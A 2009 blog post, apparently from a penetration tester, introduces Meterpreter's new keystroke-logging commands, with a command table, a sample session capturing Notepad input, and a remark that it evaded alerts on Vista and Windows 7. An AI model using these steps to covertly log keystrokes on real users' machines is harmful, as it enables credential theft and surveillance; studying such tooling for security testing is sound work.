Sunday, Mar 22, 2009

Keystroke Logging comes to Meterpreter

Today HD committed bug fixes and updates to Meterpreter to the SVN development tree; the coolest of them all has to be the availability of keystroke logging. Now when you use Meterpreter as a payload, stdapi gives you the ability to start keystroke logging by running a simple set of commands. The new commands appear as follows:

Stdapi: User interface Commands
===============================
    Command        Description
    -------        -----------
    grabdesktop    Take over the active input desktop (needed for keyboard sniffing)
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump they keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    uictl          Control some of the user interface components

The new commands are grabdesktop, keyscan_dump, keyscan_start and keyscan_stop. To start capturing keystrokes we must first run grabdesktop and then keyscan_start; this starts the capture of all keyboard input into memory.

meterpreter > grabdesktop
Trying to hijack the input desktop...
meterpreter > keyscan_start
Starting the keystroke sniffer...

To dump the content of the buffer we run keyscan_dump. For this example I captured some text I typed into Notepad:

meterpreter > keyscan_dump
Dumping captured keystrokes...
 <Back> epnow this a <Back> s a killer feature!!!!!!!! <Return>
meterpreter > keyscan_dump
Dumping captured keystrokes...
meterpreter >

Once the keystrokes are dumped they are cleared from the buffer, so save the output every time you do a dump, since otherwise it will be lost. This new feature only captures keyboard input; it will not capture clipboard content or any copy/paste activity, but it is extremely stealthy since it resides only in memory, and on my test machines with Vista with UAC enabled and with Windows 7 it did not trigger any alert. I’m anxiously looking forward to what will come next from the Metasploit team.

UPDATE 3/26/09

HD is making some changes in the code and to the names in the menu; as soon as I have a chance to test and run it in the lab I will post an update to this post.

Reader Comments (3)

No problem, I love the project!! In fact those blog posts gave me the ideas for the Meterpreter script I recently posted; as my feed had updated I kept re-writing and improving the script.

March 23, 2009 | Unregistered Commenter DarkOperator

Nice work. Found it after hdm posted on the Metasploit blog.

March 24, 2009 | Unregistered Commenter jcran

Excellent work!!
I will probably blog something similar to what the Metasploit blog guys did... but in Spanish :)

Keep up the good work!

March 27, 2009 | Unregistered Commenter John Doe
